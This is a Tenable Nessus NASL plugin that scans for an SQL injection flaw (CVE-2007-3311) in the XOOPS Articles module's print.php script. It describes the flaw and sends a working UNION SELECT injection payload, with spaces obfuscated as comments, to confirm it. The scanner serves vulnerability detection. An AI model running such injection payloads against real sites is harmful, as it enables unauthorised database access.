#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(24902);
  script_version("$Revision: 1.6 $");

  script_cve_id("CVE-2007-3311");
  script_bugtraq_id(23160);
  script_xref(name:"OSVDB", value:"34452");

  script_name(english:"XOOPS Articles Module id Parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to manipulate a description with Articles module");

  desc = "
Synopsis :

The remote web server contains a PHP application that is prone to a
SQL injection attack. 

Description :

The remote host is running the Articles module, a third-party module
for Xoops. 

The version of this module installed on the remote host fails to
properly sanitize user-supplied input to the 'id' parameter of the
'modules/articles/print.php' script before using it to build a
database query.  Regardless of PHP's 'magic_quotes_gpc' setting, an
unauthenticated remote attacker can leverage this issue to launch SQL
injection attacks against the affected application, leading to
discovery of sensitive information, attacks against the underlying
database, and the like. 

See also :

http://www.securityfocus.com/archive/1/463916/30/0/threaded
http://support.sirium.net/modules/mydownloads/viewcat.php?cid=2

Solution :

Upgrade to Articles module version 1.03 or later. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("xoops_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/xoops"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # Try to exploit the flaw to manipulate the title in a list of "cards".
  magic = unixtime();
  exploit = string("-1 UNION SELECT NULL,NULL,NULL,NULL,NULL,", magic, ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/*");
  exploit = str_replace(find:" ", replace:"/**/", string:exploit);

  req = http_get(
    item:string(
      dir, "/modules/articles/print.php?",
      "id=", exploit
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we managed to set the description based on our magic.
  if (
    "First posted" >< res &&
    string("<td>", magic, "</td>") >< res
  )
  {
    security_hole(port);
    exit(0);
  }
}
